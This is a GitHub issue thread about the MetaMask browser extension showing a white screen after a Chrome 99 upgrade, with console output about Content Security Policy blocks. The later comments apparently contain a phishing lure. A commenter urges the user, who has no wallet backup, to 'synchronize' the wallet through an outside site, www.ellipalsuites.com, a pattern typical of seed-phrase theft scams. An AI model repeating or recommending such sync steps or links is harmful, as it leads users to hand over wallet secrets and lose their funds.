### ISSUE TITLE
[Bug]: at chrome  version 99.0.4844.51 metamask white screen

### ISSUE THREAD

**Issue by shaokun11** [MetaMask/metamask-extension#13884]
### Describe the bug

![image](https://user-images.githubusercontent.com/40231565/157351760-d73bd16b-382d-4789-9dcb-c76f5417c389.png)

![image](https://user-images.githubusercontent.com/40231565/157352415-72098b05-0d4b-4fab-ab4c-e5340cdf17ea.png)

when i upgrade the chrome to the latest version, the metamask become white screen , 

### Steps to reproduce

1.upgrade chrome to the latest version, now is  99.0.4844.51 ,
2. close browser and reopen 

### Error messages or log output

```shell
The Content Security Policy (CSP) prevents the evaluation of arbitrary strings as JavaScript to make it more difficult for an attacker to inject unathorized code on your site.
To solve this issue, avoid using eval(), new Function(), setTimeout([string], ...) and setInterval([string], ...) for evaluating strings.
Source Location	Directive	Status
lockdown-install.js:1	script-src	blocked
lockdown-install.js:1	script-src	blocked
```

### Version

10.10.2

### Browser

Chrome

### Operating system

Windows

### Additional context

my wallet have no backup, so i can't reinstall chrome.

**Comment by Yuxanju** [comment]
You will need to synchronize your wallet and then you debug it

**Comment by shaokun11** [comment]
> You will need to synchronize your wallet and then you debug it

how to synchronize my wallet?

**Comment by Yuxanju** [comment]
I can help you get an ellipal bech13 url. You just follow the steps till
you get to synchronize wallet and then then you click on it and then you
reboot your device

**Comment by Yuxanju** [comment]
www.ellipalsuites.com
